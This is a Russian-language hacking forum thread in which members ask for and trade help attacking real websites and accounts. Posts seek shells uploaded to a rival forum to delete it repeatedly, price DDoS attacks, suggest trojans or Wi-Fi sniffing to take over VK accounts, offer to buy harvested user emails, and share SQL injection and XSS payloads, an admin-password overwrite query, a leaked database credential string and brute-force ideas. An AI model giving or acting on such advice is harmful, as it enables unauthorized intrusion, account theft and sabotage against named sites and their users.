Коллеги, подскажите какой-нибудь сайт, аналогичное cve\.mitre\.org что бы там фиксировались все (ну или почти все) уязвимости на джумлу и друпал. Хотелось бы для мониторинга уязвимостей.
Спасибо!
https://vulners.com/ конечно же)
demafly76
20.08.2016, 17:32
"]
[XOR] said:
↑ (https://antichat.live/posts/3983274/)
Как всем этим можно воспользоваться? Я, конечно, читал про SQL Injection, и про XSS, и про Shell Injection. Но везде про это написано на столь начальном уровне, что применить эти знания в реальных условиях не получается
читать мало, нужно понимать сам процесс....
Namelimit
20.08.2016, 18:55
"]
[XOR] said:
↑ (https://antichat.live/posts/3983274/)
? Пробовал так
/index.php?app=blog&module=display§ion=blog&blogid=181&showentry=99'%20-->">'>'"alert()
и ничего не происходит. Помогите разобраться.
В любые формы ввода вставляй и жми на привязанную к ней кнопку, если имеется уязвимость, то получишь всплывающее окно.
Подробнее: /threads/20140/ (https://antichat.live/threads/20140/)
Реально ли взломать сайт ВордПресс? Посоветуйте способы
Rem0teC0DE
25.08.2016, 17:47
Хэй гангстеры, никто не вкурсе как ВК проверяет архивы которые ты прикрепляешь? забавно то, что они не чекают .gz и можно накидывать исполняемые файлы черз такие архивы. А вот рар и запароленный рар они чекают на наличие исполняемых файлов. Складывается вопрос, как? смотрят заголовки? смотрел через бюрпсьют реквесты и респонсы, так вот в респонасх видно что там лежит исполняемый файл и выкидывает эррор
Ребята помогите пожалуйста, вот темка про эксплойт на phpmyadmin
[ Обзор уязвимостей phpMyAdmin ] (https://antichat.live/threads/50669/page-2/)
не чего не пойму как ей пользоваться ?
прошу не кидайте в меня камни, просто скажите как это сделать
↑ (https://antichat.live/posts/3984849/)
Ребята помогите пожалуйста, вот темка про эксплойт на phpmyadmin
[ Обзор уязвимостей phpMyAdmin ] (https://antichat.live/threads/50669/page-2/)
не чего не пойму как ей пользоваться ?
прошу не кидайте в меня камни, просто скажите как это сделать
Найди другой эксплоит
Этот чёт и я не смог запустить
↑ (https://antichat.live/posts/3984854/)
Найди другой эксплоит
Этот чёт и я не смог запустить
Я буду искать. Расскажи как ты его запускал и через что ? я просто вообще не пойму как подобным пользоваться.
powerOfthemind
30.08.2016, 12:20
↑ (https://antichat.live/posts/3984869/)
Я буду искать. Расскажи как ты его запускал и через что ? я просто вообще не пойму как подобным пользоваться.
Самое простое сделай пхп файл на другом шеле или локал сервере и запусти через браузер
Здравствуйте имеется файлы ipb 2/3/6 и база которое украли у меня и на новом адресе запустили форум но форум был запушен именно с теми файлами и с базой которые у меня есть моды все добавлял сам короче можно ли как то грохнуть тот форум который был запушен на новом адресе ? или может кто то взяться за работу ? заранее благодарен за ответ.
↑ (https://antichat.live/posts/3987935/)
Здравствуйте имеется файлы ipb 2/3/6 и база которое украли у меня и на новом адресе запустили форум но форум был запушен именно с теми файлами и с базой которые у меня есть моды все добавлял сам короче можно ли как то грохнуть тот форум который был запушен на новом адресе ? или может кто то взяться за работу ? заранее благодарен за ответ.
в скорей всего кто то использовал эксплоит, поставь патчи только с норм форумов бери а то на shell нарвёшься и опять же проверь свои, может и всё что ты кидал на сервак там может быть shell
есть кто вазмотся за работу за деньги ? так как я сам ни шарю в этом.
↑ (https://antichat.live/posts/3988181/)
есть кто вазмотся за работу за деньги ? так как я сам ни шарю в этом.
ради интереса сколько платишь ?
gordondalos
05.09.2016, 21:46
Кто-нибуть знает алгоритм программы dirbruster?. Поделитесь как она работает. Или хотябы сделайте свое предлоложение.
↑ (https://antichat.live/posts/3988186/)
ради интереса сколько платишь ?
500 руб.
↑ (https://antichat.live/posts/3987945/)
в скорей всего кто то использовал эксплоит, поставь патчи только с норм форумов бери а то на shell нарвёшься и опять же проверь свои, может и всё что ты кидал на сервак там может быть shell
Причём тут сплойт ?
Обычный его дамп загрузили к себе, вот и все.
↑ (https://antichat.live/posts/3988216/)
Причём тут сплойт ?
Обычный его дамп загрузили к себе, вот и все.
Фу бля я думал типа его форум хакнули и он хочет теперь защититься )
не так понял короче ну бывает
↑ (https://antichat.live/posts/3988195/)
500 руб.
Найди человека которы дудос может провести на 500 рублей мало и не надолго купи ботнет или что то типа того я в досе не силён
↑ (https://antichat.live/posts/3988195/)
500 руб.
Прости, но за такие деньги ты только в отхожее место сбегаешь )
↑ (https://antichat.live/posts/3988222/)
Найди человека которы дудос может провести на 500 рублей мало и не надолго купи ботнет или что то типа того я в досе не силён
За дудос минимальная цена стартует от 30$ в сутки (на не защищенный сайт), если он защищенный - следовательно и цена выше.
Ботнет за такие деньги он не купит, разве что с количеством в 1,2 бота.
понял спасибо всем ну вой форум не хакнули проста культурно все через хостер увели и открыли на новом адресе теперь я подумал может кто им на новый адрес бросить шел чтобы каждый раз после восстонавление через бекап форум я шлепал их через шел .
я могу заплатить нужную сумму но сгарантией что больше этот форум в интернете не появиться ото какой смысыл платить деньги и через час через бекап опять восстановят форум пиратский.
↑ (https://antichat.live/posts/3988252/)
я могу заплатить нужную сумму но сгарантией что больше этот форум в интернете не появиться ото какой смысыл платить деньги и через час через бекап опять восстановят форум пиратский.
Backup храняться на стороне хостера, его то не взломаешь.
↑ (https://antichat.live/posts/3988259/)
Backup храняться на стороне хостера, его то не взломаешь.
вот что мне нужно скажу по подробнее залить на форум шел и через шел удалять например темы они опять будут восстанавливать базу на один день раньше но они не будут менять файлы которые мы залили шел и опять через шел будем удалять что та им надоест все это и они сами сгинут.
↑ (https://antichat.live/posts/3988280/)
вот что мне нужно скажу по подробнее залить на форум шел и через шел удалять например темы они опять будут восстанавливать базу на один день раньше но они не будут менять файлы которые мы залили шел и опять через шел будем удалять что та им надоест все это и они сами сгинут.
Если у них бекап за тот момент когда шелл ещё не присутствовал, восстановление его удалит.
↑ (https://antichat.live/posts/3988281/)
Если у них бекап за тот момент когда шелл ещё не присутствовал, восстановление его удалит.
А шелл заливается в корень сайта или в базу сайта ? если в корень то они врятли догадаются если в базу то тут да вы правы, ну если шелл легко заливать на форум то нужно найти кто мне на учет грузить шелл на форум и каждый день буду сам грузить и лопать именно тот форум.
↑ (https://antichat.live/posts/3988315/)
А шелл заливается в корень сайта или в базу сайта ? если в корень то они врятли догадаются если в базу то тут да вы правы, ну если шелл легко заливать на форум то нужно найти кто мне на учет грузить шелл на форум и каждый день буду сам грузить и лопать именно тот форум.
В корень конечно. Ну а как им не догадаться, если ваша цель - убить форум.
можете научить заливку шелла на форум ? или можете сами сделать ? учителю без базара заплачу за учебу. Кто может на учить пишите в л/ч сообщение. Заранее благодарен. И всем спасибо за ответы. всех благ
BabaDook
06.09.2016, 02:28
Идите в другой раздел с такими предложениями. Тут вопросы и ответы на тему уязвимости.
↑ (https://antichat.live/posts/3988337/)
можете научить заливку шелла на форум ? или можете сами сделать ? учителю без базара заплачу за учебу. Кто может на учить пишите в л/ч сообщение. Заранее благодарен. И всем спасибо за ответы. всех благ
Кинь в личку адрес форума
Johnydriver
06.09.2016, 18:56
Как угнать домены в зоне .com
например в зоне ру как через стил домен, но нужно в зоне .com
↑ (https://antichat.live/posts/3988601/)
Как угнать домены в зоне .com
например в зоне ру как через стил домен, но нужно в зоне .com
Как вариант палить домены без ДНСа под хост который нужен.
Друзья, есть слепая скуля, time-based, у юзера есть привилегии: file, insert,update,delete,create,drop etc... Что можно сделать? Я так понимаю, т.к есть привилегия file,то есть возможность залить шел? Кто-то поможет осуществить?
BabaDook
06.09.2016, 21:43
↑ (https://antichat.live/posts/3988657/)
Друзья, есть слепая скуля, time-based, у юзера есть привилегии: file, insert,update,delete,create,drop etc... Что можно сделать? Я так понимаю, т.к есть привилегия file,то есть возможность залить шел? Кто-то поможет осуществить?
Можете Писать,удалять, изменять данные в ДБ, так же работать с файлами.
↑ (https://antichat.live/posts/3988710/)
Можете Писать,удалять, изменять данные в ДБ, так же работать с файлами.
Это я понимаю, но вот найти директорию под залив не получается )
↑ (https://antichat.live/posts/3988775/)
Это я понимаю, но вот найти директорию под залив не получается )
SQLmap попробуй
↑ (https://antichat.live/posts/3988778/)
SQLmap попробуй
Пытаюсь прочитать /etc/passwd, начинает показывать что-то в хексе. => Существует путь /etc/passwd, но куда заливать то? )
Johnydriver
06.09.2016, 23:48
↑ (https://antichat.live/posts/3988629/)
Как вариант палить домены без ДНСа под хост который нужен.
ну вроде стил домен так-же работал.
А как это можно сделать, я бы написал шаб для зенки, то как чекать не знаю
BabaDook
06.09.2016, 23:49
↑ (https://antichat.live/posts/3988775/)
Это я понимаю, но вот найти директорию под залив не получается )
phpinfo, config, ошибки различные. стандарные пути
↑ (https://antichat.live/posts/3988789/)
phpinfo, config, ошибки различные. стандарные пути
Можешь помочь/попробовать залить, дам вектор под хайд, а то вечер сижу, и без результатов )
Или другие желающие найдутся? )
↑ (https://antichat.live/posts/3988367/)
Кинь в личку адрес форума
скинул
Не подскажете, как заглянуть внутрь нагрузки? К примеру тут 0x7176787671 похоже на шеснадцатиричный код, но декодировать в текст не могу. Нагрузка сгенерирована при помощи sqlmap.
id=242' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717678 7671,0x7775534e73797142664f636876556e7774774d7a616 b73746d567763725754774a715966786d5642,0x716a6b6a71 ),NULL-- pKKs
BabaDook
10.09.2016, 19:33
Hex to string
↑ (https://antichat.live/posts/3989903/)
Не подскажете, как заглянуть внутрь нагрузки? К примеру тут 0x7176787671 похоже на шеснадцатиричный код, но декодировать в текст не могу. Нагрузка сгенерирована при помощи sqlmap.
id=242' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717678 7671,0x7775534e73797142664f636876556e7774774d7a616 b73746d567763725754774a715966786d5642,0x716a6b6a71 ),NULL-- pKKs
Пробовал, но вразумительного текста не увидел. Так и не понял, что же sqlmap в инекции скармливает базе. К примеру самый длинный хекс из приведенного мною запроса при конверсии выдает wuSNsyqBfOchvUnwtwMzakstmVwcrWTwJqYfxmVB
BabaDook
10.09.2016, 20:19
↑ (https://antichat.live/posts/3989990/)
Пробовал, но вразумительного текста не увидел. Так и не понял, что же sqlmap в инекции скармливает базе. К примеру самый длинный хекс из приведенного мною запроса при конверсии выдает wuSNsyqBfOchvUnwtwMzakstmVwcrWTwJqYfxmVB
И что? Что по вашему должно было быть? Если я блядь сказал hex, значит так оно есть и не*** ебать мозг другим своими блядскими догадками и предположениями. Уяснили все ?
Да ладно. Не надо так бурно реагировать.
строка ?search=" вызывает DatabaseException на сайте, как можно развить иньекцию?
?search="+and+1="1успешно отрабатывает.
если пишу ?search="+#, ?search="+--, ?search="+/* - не помогает, создается впечатление что комментарии не работают...
update. Еще такая фича проходит "+and+(SELECT+"test")+or+1="1
Подскажите пожалуйста
ufagatezakaz
18.09.2016, 11:15
залил шелл, помогите найти путь до шелла, за $$$
powerOfthemind
24.09.2016, 00:39
↑ (https://antichat.live/posts/3992708/)
залил шелл, помогите найти путь до шелла, за $$$
Откуда такая увереность тогда что он залился? Если ты путь найти не можеш. Какой движок стоит ?
Vasiliy37
25.09.2016, 16:37
как взломать пользователя вк?
winstrool
26.09.2016, 00:26
↑ (https://antichat.live/posts/3995052/)
как взломать пользователя вк?
Впарить ему троян, фейк, отснифать его вайфай если он его юзает, e.t.c...
powerOfthemind
27.09.2016, 00:11
↑ (https://antichat.live/posts/3995218/)
Впарить ему троян, фейк, отснифать его вайфай если он его юзает, e.t.c...
С Wi-fi канает ещё ? https разве не шифруте трафик?
CyberTro1n
27.09.2016, 19:26
http://black-d.biz на чем дерьмо держится? причем там iklad-chat.biz
chat.iklad-chat.biz ?
bereznev
27.09.2016, 23:56
Как залить шелл на лендинг? Есть ли мануал или полезные ссылки для первых шагов в этом направлении?
↑ (https://antichat.live/posts/3995994/)
Как залить шелл на лендинг? Есть ли мануал или полезные ссылки для первых шагов в этом направлении?
получи доступ к ftp и делай что хочешь
bereznev
28.09.2016, 20:55
↑ (https://antichat.live/posts/3996172/)
получи доступ к ftp и делай что хочешь
Доступ к фтп можно получить только снифером или загнать стилер паролей на компьютер жертвы? Или ещё есть варианты?
Есть смысл прогревать сапорт хостера, чтобы слили пароль от фтп?
CyberTro1n
28.09.2016, 21:45
↑ (https://antichat.live/posts/3996325/)
Есть смысл прогревать сапорт хостера, чтобы слили пароль от фтп?
Забавно) всегда как вар.
Camelot495
28.09.2016, 22:46
Как задать вопрос?
↑ (https://antichat.live/posts/3996358/)
Как задать вопрос?
Вот так
Camelot495
28.09.2016, 22:52
Скажите пожалуйста. Возможно ли узнать пин код wps имея пароль от точки доступа?
На точках доступа включен wps. Реавер ни как не может подобрать пин для этих точек. Пришлось хватать handshake. И брутить, брутить.
BabaDook
28.09.2016, 23:01
↑ (https://antichat.live/posts/3996366/)
Скажите пожалуйста Возможно ли узнать пин код wps имея пароль от точки доступа?
На точках доступа включенwps. Ривер не может подобрать пин для этих точек пришлось хватать handshaking брутить.
Можно, но надо ещё доступ к самому ротуеру получить.
Camelot495
29.09.2016, 09:05
↑ (https://antichat.live/posts/3996367/)
Можно, но надо ещё доступ к самому ротуеру получить.
То есть пин прячется где-то в настройках роутера. А скажите какой путь к этому восьмизначному числу. Направление. Или это зависит от модели роутера.!? А то знаете как бывает - сменят пароль и начинай все сначала.
P.s. А авторизация у маршрутизаторов - по дефолту ))
Camelot495
29.09.2016, 18:47
Zuxel Keenetic 4G III : Пин код посмотрел в настройках роутера - Система->Файлы->self-test
(52127441)
Подскажите начинающему: можно ли с помощью sql инъекций получить валидные пары логин/пароль с таких сайтов, например как этот: _https://ovuepks.centertelecom.ru ? Или для этого применяются какие-то другие методы? М.быть какой-то перебор?
BabaDook
06.10.2016, 20:28
↑ (https://antichat.live/posts/3999045/)
Подскажите начинающему: можно ли с помощью sql инъекций получить валидные пары логин/пароль с таких сайтов, например как этот: _
https://ovuepks.centertelecom.ru
? Или для этого применяются какие-то другие методы? М.быть какой-то перебор?
Сложный вопрос , однако я отвечу что можно. И с помощью sql инъекций получить валидные пары логин/пароль и других не меньше известных уязвимостей. Так же хочу обратить внимание что это стечение обстоятельств, так же стоит не забывать другие очень важные факторы. Как говорил Чингачгук, всё в наших копьях.
↑ (https://antichat.live/posts/3999045/)
Подскажите начинающему: можно ли с помощью sql инъекций получить валидные пары логин/пароль с таких сайтов, например как этот: _
https://ovuepks.centertelecom.ru
? Или для этого применяются какие-то другие методы? М.быть какой-то перебор?
Чувак через sql injection ты как бы взломаешь базу данных сайта, а там представляешь вся инфа о пользователях есть
PHP 5.6.9 Use-After-Free Он есть в Metasploit Pro 4.12.0 ?
Я искал в модулях но когда ввожу название там стони совсем других эксплоитов появляются
Так ну тут тема называется "Задай Вопрос - Получи Ответ" щас посмотрим как я ответ получу )
BabaDook
07.10.2016, 00:27
↑ (https://antichat.live/posts/3999127/)
PHP 5.6.9 Use-After-Free Он есть в Metasploit Pro 4.12.0 ?
Я искал в модулях но когда ввожу название там стони совсем других эксплоитов появляются
Так ну тут тема называется "Задай Вопрос - Получи Ответ" щас посмотрим как я ответ получу )
Советую вам сашка создать отдельную тему в песочнице и апать чаще.Так же прошу заметить, ответ вы получили довольно оперативно и дельный, оба этих фактора играют важную роль на форуме и в мире в целом.
А есть софт который сам ищет sql injection на asp сайте?
↑ (https://antichat.live/posts/3999862/)
А есть софт который сам ищет sql injection на asp сайте?
Acunetix
Если на сайте открыта папка можно на неё залить свою страничку\скрипт? С помощью чего?
↑ (https://antichat.live/posts/3999874/)
Если на сайте открыта папка можно на неё залить свою страничку\скрипт? С помощью чего?
Права на запись есть ?
ChocolatePuma
09.10.2016, 14:43
Нашел XSS, (постоянно вставляю ">TESTCSS)
Но если вставить: ">alert(document.cookie);
Результат: [removed]alert([removed]);[removed]"/>
Как обойти?
ChocolatePuma
09.10.2016, 14:52
Так тоже не выходит:
Фильтрует слово "javascript", получается:
↑ (https://antichat.live/posts/3999889/)
Права на запись есть ?
Как проверить? Папка через браузер открывается и в ней список файлов
Такой ещё вопросик-
На фтп есть 2 учетки. Одна моя, вторая соседа.
Можно как то вытянуть пароль от учетки соседа?
Брут и паяльник не предлогать)))
Добрый день, есть база логинов пользователей, необходимо провести брутфорс, но на сайте капча, можно ли брутить в полуавтоматическом режиме(т.е когда необходимо ввести капчу это буду делать я)
p8araDISE5
14.10.2016, 17:41
Есть xss на сайте,помогите новичку написать код для изменения параметров http://itmages.ru/image/view/5026739/56b906a8
p8araDISE5
14.10.2016, 18:07
Сильно нуждаюсь в вашей помощи,может кто литературой поделится по HTML и JS
CyberTro1n
14.10.2016, 22:24
Kакие еще есть способы обхода CloudFlareдля обнаружения реального ипа помимо инструментов Nmap, Dig, nslookup и
http://www.crimeflare.com/cfs.html
? (https://www.google.ru/search?newwindow=1&q=CloudFlare&spell=1&sa=X&ved=0ahUKEwjKwuKK9drPAhVsIpoKHbPWCPcQvwUIGygA)
fox777xxx
17.10.2016, 22:55
господа,доброго времени суток. суть такова - образования профильного не имею,имею некоторую информацию о актуальных темных схемах в сети,имею некоторый опыт сотрудничества,но давно мечтаю все делать сам и пробраться в недры искусства. не хотелось бы тратить время на воду и ее изучение,интересуют прикладные материалы:статьи,мануалы,в зможно видео,софт, как говорится кто чем может. Буду рад любой помощи. Если будут желающие стать наставниками ,менторами дабы поделиться опытом- буду признателен.
более детально интерес описать не могу- могут забанить.
если коротенько-интересует ботнет, трояны под ios и android, ну и подобные вещи.
не судите строго,просто тяга бешеная к этому ремеслу с малых лет,а возможностей не было.
Camelot495
23.10.2016, 20:20
Здравствуйте. Помогите определиться с выбором wi-fi адаптера для пентестов на kali-rolling-2016-2-release! Сейчас пользуюсь awus036h.
(Неделю назад купил awus051nh версия 2 - для Windows работает хорошо. В Кали Linux тоже работает да вот только WPS reaver не подбирает.... и хендшейк не хочет ловить кстати он вообще не видит station. ....... ) (Доп. драйвера не ставил, патчи не применял.)
Посоветуйте внешний, универсальный и перспективный wi-fi адаптер для kali без танцев с бубеном!
Есть сайт на который заливаются файлы. Как узнать папку куда они заливаются?
http://printing-servicesinc.com/Upload_Files.asp
↑ (https://antichat.live/posts/3999901/)
Так тоже не выходит:
Фильтрует слово "javascript", получается:
Попробуй вот это /threads/13949/ (https://antichat.live/threads/13949/)
Octavian
09.12.2016, 18:54
http://www.bri.gov.md/logs/bri.gov.md.access.log
Есть лог как провести пхп инекцыю?
Atilekt.CMS кто знает где почитать про уязвимости данной cms или с кем пообщаться?
winstrool
11.01.2017, 12:08
↑ (https://antichat.live/posts/4034902/)
Atilekt.CMS кто знает где почитать про уязвимости данной cms или с кем пообщаться?
Качаешь исходники, изучаешь код, ищешь уязвимые моменты, тестируешь!
Если не получается найти pma , но доступ к бд имеется, есть ли какой то вариант приконектится к бд?
↑ (https://antichat.live/posts/4035509/)
Если не получается найти pma , но доступ к бд имеется, есть ли какой то вариант приконектится к бд?
если доступ разрешен только с localhost, то можно найти соседние площадки на этом сервере, получить доступ к одной из них - загрузить pma
↑ (https://antichat.live/posts/4035530/)
если доступ разрешен только с localhost, то можно найти соседние площадки на этом сервере, получить доступ к одной из них - загрузить pma
Ну, не... Соседи точно не вариант.
BabaDook
13.01.2017, 15:16
↑ (https://antichat.live/posts/4035509/)
Если не получается найти pma , но доступ к бд имеется, есть ли какой то вариант приконектится к бд?
Так у тебя доступ к БД есть, где проблема ?
↑ (https://antichat.live/posts/4035552/)
Ну, не... Соседи точно не вариант.
почему не вариант?
↑ (https://antichat.live/posts/4035576/)
Так у тебя доступ к БД есть, где проблема ?
если правильно понял, под доступом он подразумевает логин/пароль
winstrool
13.01.2017, 15:27
на соседних площадках имеет смысл поискать pma или его аналоги
P.S: к примеру берем ип домена и собираем список всех соседей, потом по списку начинаем сканить файликом возможных путей и названий
Всем шалом!
Как наверное многие, задался вопросом о взломе страниц пользователей соц сетей ВК и ОК, не корысти ради, а ради увеличения базы знаний и возможностей.
Способы с перехватом трафика работают отлично, но при условии нахождения с одной сети с юзером странички, здесь все просто и понятно.
А теперь вопрос! Возможно ли взломать страничку ВК или ОК зная, например, логин или id юзера?Или все это полный бред?
Господа, давайте раскроем эту животрепещущую для многих тему! Если возможно - пишем актуальные способы! Если это не возможно, или сверх сложно, то так и говорим! И пусть все живут спокойно)
Надеюсь, что остались те люди, кому небезразличны принципы свободы и гласности в сети, ну Вы поняли о чем я)))
Да прибудет с Вами Сила!)
pastword
27.02.2017, 09:34
на сайта есть поисковик с ХСС(input), значение принимает мин = 3, макс = 30 если написать 123'union select user()'-- выводится ошибка:
The used SELECT statements have a different number of columns
вопрос: как обойти ограничение в длине ввода запроса
↑ (https://antichat.live/posts/4053701/)
как обойти ограничение в длине ввода запроса
моя твоя не понимать....
тебе же написали НЕВЕРНОЕ КОЛИЧЕСТВО СТОЛБЦОВ. Какую длину и куда вводить ты её собрался? уж по таким простым инъектам тысячи статей написано
pastword
27.02.2017, 11:18
"]
[aywo] said:
↑ (https://antichat.live/posts/4053718/)
моя твоя не понимать....
тебе же написали НЕВЕРНОЕ КОЛИЧЕСТВО СТОЛБЦОВ. Какую длину и куда вводить ты её собрался? уж по таким простым инъектам тысячи статей написано
привет! дело в том что количество столбцов я выяснил их 7 но чтобы получить информацию из infomation_schema приходится написать запрос который содержит более 30 символа, а в input-е ограничение. Нельзя ли как то обойти эту грань?
Octavian
27.02.2017, 13:47
↑ (https://antichat.live/posts/4053736/)
привет! дело в том что количество столбцов я выяснил их 7 но чтобы получить информацию из infomation_schema приходится написать запрос который содержит более 30 символа, а в input-е ограничение. Нельзя ли как то обойти эту грань?
Это делается легко просто нужно поймать POST запрос.Любои програмои
1 HackBar :: Дополнения Firefox (https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiB_qWh_q_SAhUPS5oKHVhZBDQQFggcMAA&url=https%3A%2F%2Faddons.mozilla.org%2Fru%2Ffirefo x%2Faddon%2Fhackbar%2F&usg=AFQjCNFy3KPgI2IoNcxUOE_8SHTcJdjMrw&sig2=jGrG76oRZEqoXqVQeKxEAA&bvm=bv.148073327,d.bGg)
2 Burp Suite
3 Charles
4 Live HTTP Headers :: Дополнения Firefox (https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=0ahUKEwiU8vXU_q_SAhVIDiwKHVhyANkQFggcMAA&url=https%3A%2F%2Faddons.mozilla.org%2Fru%2Ffirefo x%2Faddon%2Flive-http-headers%2F&usg=AFQjCNGqzx5qAELEaHjU1OahT46Ja0bcZg&sig2=llnPyl7ds4ga3V0BErjNmw&bvm=bv.148073327,d.bGg)
Ногами не пинать)
Есть три БД например:
1111
2222
3333
Например в БД 1111 присутствует таблица 'admin' с полями:
555:
-id
-pass
-username
666
777
Как мне заменить значение поля (например 'pass') в таблице 555 (БД 1111) одним запросом?
ТОесть, не писать пару запросов:
USE 1111 ;
а потом
UPDATE 1111 SET pass='3ca8600e6e503543e651b8f3f2a511cf' where id=1
↑ (https://antichat.live/posts/4063714/)
Ногами не пинать)
Есть три БД например:
1111
2222
3333
Например в БД 1111 присутствует таблица 'admin' с полями:
555:
-id
-pass
-username
666
777
Как мне заменить значение поля (например 'pass') в таблице 555 (БД 1111) одним запросом?
ТОесть, не писать пару запросов:
USE 1111 ;
а потом
UPDATE 1111 SET pass='3ca8600e6e503543e651b8f3f2a511cf' where id=1
UPDATE [ИМЯ СХЕМЫ].[ИМЯ БАЗЫ].[ИМЯ ТАБЛИЦЫ] SET pass='3ca8600e6e503543e651b8f3f2a511cf' where id=1
Просто полное имя таблиц указываешь с именем базы.
pastword
25.03.2017, 12:47
что нужно для того чтобы внести изминения в базу через sql-inject
Какие уязвимости есть в phpmyadmin 3.4.11.1 ? Версия не самая новая но именно по ней ни инфы ни эксплоитов не нашел
Добрый день,я начинающий юзверь).Подскажите с чего начинать изучение веб-уязвимостей,или мне следует выучить для начала язык программирования(почему то охото с ассемблера начать)?Посоветуйте литературу и программы пожалуйста)
↑ (https://antichat.live/posts/4069764/)
Добрый день,я начинающий юзверь).Подскажите с чего начинать изучение веб-уязвимостей,или мне следует выучить для начала язык программирования(почему то охото с ассемблера начать)?Посоветуйте литературу и программы пожалуйста)
с желания разбираться, точки отсчета там нету, инфы кругом полно
↑ (https://antichat.live/posts/4069764/)
Добрый день,я начинающий юзверь).Подскажите с чего начинать изучение веб-уязвимостей,или мне следует выучить для начала язык программирования(почему то охото с ассемблера начать)?Посоветуйте литературу и программы пожалуйста)
Для начала начни с этого, все подробно и по порядку расписано.
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
приветствую всех) подскажите на что я набрёл
[DATABASE]
C1=Provider=LCPI.IBProvider;data source=(здесь IP) :C:\WCDATA\Main\WC.GDB;ctype=win1251;user id=sysdba;auto_commit=true;password=masterkey
это я в локалке рабочей сервак нашёл и там строка в некоторых папках
искал хоть какие то пароли что бы кэрио выкл =(
приветствую) подскажите на что я набрёл,от чего может быль этот пароль?
[DATABASE]
C1=Provider=LCPI.IBProvider;data source=(здесь IP) :C:\WCDATA\Main\WC.GDB;ctype=win1251;user id=sysdba;auto_commit=true;password=masterkey
это я в локалке рабочей сервак нашёл и там строка в некоторых папках
искал хоть какие то пароли что бы кэрио выкл =(
Вечер добрый, у меня вопрос. Залил я пару шеллов в chroot окружение неких серваков, спасибо проге sqlmap и её разработчикам. Но насколько я знаю это не круто, когда ты заюзав одну прогу получил дно-права на серваке. Вопрос в следующем: как поднять свои права на этих самых серваках до root/Администратора (понимаю, что этот вопрос требует уточнения некоторых моментов, подскажите в какую сторону направить google паруса (юзал --os-shell)), и как используя чужие сплоиты и пайлоады (исходники имеется ввиду) можно получить некоторые права на сервере. Заранее спасибо.
P.S. Скачал пару троек журналов ][акер, в них описываются подобные взломы, надеюсь на то что не только этот журнал, но и античатлане помогут мне вырасти из скрипткидисовых колготок в тру-хацкерские джинсы XD
Octavian
08.05.2017, 14:56
Есть сайт при добавление проверенного номера телефона в обявлении на телефон отправляется 4 значный цифровой код, на подтверждение кодом дается минута насколько возможно сбрутить простыми ресурсами 10.000 вариантов / 60 сек?
Выходит 166 в секунду многовато?
lolidoli
13.05.2017, 02:40
↑ (https://antichat.live/posts/4081649/)
Есть сайт при добавление проверенного номера телефона в обявлении на телефон отправляется 4 значный цифровой код, на подтверждение кодом дается минута насколько возможно сбрутить простыми ресурсами 10.000 вариантов / 60 сек?
Выходит 166 в секунду многовато?
нет))
для начала берёшь трубку и юзаешь коды.. повторы бывают на 75%.. вот целый день коды половишь а потом уже и начинай брут
couldnot332
18.05.2017, 15:47
Приветик, я обнаружил на одном сайте сразу 3 уязвимости(SSRF,LFI,SQL injection), но не могу их эксплуатировать так как не знаю как)) Помогите пожалуйста!http://i.imgur.com/pikLl00.png
Alexandr17
08.10.2017, 16:01
Всем здарова! Прошу откликнутся знатоков этого форума, которые подсказали бы как експлуатировать эту уязвимость на сайте
Incorrect caching directives (higher risk). Проблема в директории сайта и риск повышенный. Понимаю, что не так всё просто, лёгких путей не ищу. SQL иньекции и т.д и т.п. Знаю что на данном форуме есть профи своего дела. Я прошу просто подсказки в каком направлении мне двигаться и какие программы для этой уязвимости использовать. Не исключено знание языков web программирования. Но именно их не изучал. Буду благодарен за ответ Всем кто откликнется
есть сотни сайтов выгружу сейчас только несколько для примера, на них люди проходят регестрацию с указанием своей почты или оставляют заявки так же с почтой, мне нужно узнать почты всех кто там оставлял заявки, возможно такое или нет?
https://eos.io/ https://www.mercuryprotocol.com/ https://adshares.net/ https://moldcoin.jp/index.html (https://moldcoin.jp/) https://www.hydrominer.org/
если возможно готов покупать эти базы за крипту или кэш...
хочу долгое продуктивное сотрудничество, сайтов сотни ..готов оплатить ве расходы
superstar119
21.11.2017, 17:35
Добрый день, хотелось бы взломать сайт своей бывшей школы я совсем новичок в этом деле, скажу только что, sql инъекция не прошла, а wordpress выдает ошибку хотя по инфе нарыл, что сайт на wordpress написан был, если за это не банят, то вот сайт http://www.leaderschool.kz/ модераторы не баньте, можете ссылку удалить)
wordpress достаточно надёжная промышленная цмс, так с коначка её его не подломить
Aleksandr081
25.11.2017, 18:05
Ответьте пожалуйста , почему у меня не запускается программа hashcat , компьютер выдаёт такую ошибку : http://i.piccy.info/i9/ca564b29741c54628805acffc6e91367/1511617809/146452/1199646/Hashcat.jpg
Может быть причина , в том что видеокарта не подходит , я проверил программой GPU-Z.1.12.0.exe , и вот скриншот с данными : http://i.piccy.info/i9/7073f4b562e39b26dbac9afb590735a8/1511618350/103519/1199646/Vydeokarta.jpg
Turanchocks_
25.11.2017, 18:08
↑ (https://antichat.live/posts/4153455/)
Ответьте пожалуйста , почему у меня не запускается программа hashcat , компьютер выдаёт такую ошибку :
http://i.piccy.info/i9/ca564b29741c54628805acffc6e91367/1511617809/146452/1199646/Hashcat.jpg
Может быть причина , в том что видеокарта не подходит , я проверил программой GPU-Z.1.12.0.exe , и вот скриншот с данными :
http://i.piccy.info/i9/7073f4b562e39b26dbac9afb590735a8/1511618350/103519/1199646/Vydeokarta.jpg
Подойдя к программам подобного толку, всё же надоть задуматься о никсах. Ну не ХР же, ёбен-бобен.
На удаленном серваке заблокирован доступ ко всем портам кроме 80 или 443. Есть ли возможность пробросить tty по 80 порту через веб-шелл ? (Попытки подрубится к/с сервака неудачны, т.к. iptables заблокировал весь остальной траффик). Веб-шелл работает не от рута, поэтому нету возможности заспавнить tty от рута чтобы очистить iptables.
Aleksandr081
07.01.2018, 13:49
Такая ситуация , здесь мне подобрали пароль к сети wi-fi , он естественно правильный и подошёл .
А у меня ни программа Elcomsoft.Wireless.Security.Auditor.Pro.v4.0.211.0-Lz0 , ни программа aircrack-ng-1-2-rc-2-en-win ничего не нашли , и это при том что в текстовом файле – словаре , правильный пароль есть . Но программы почему-то его не видят и не находят . Как такое может быть ?
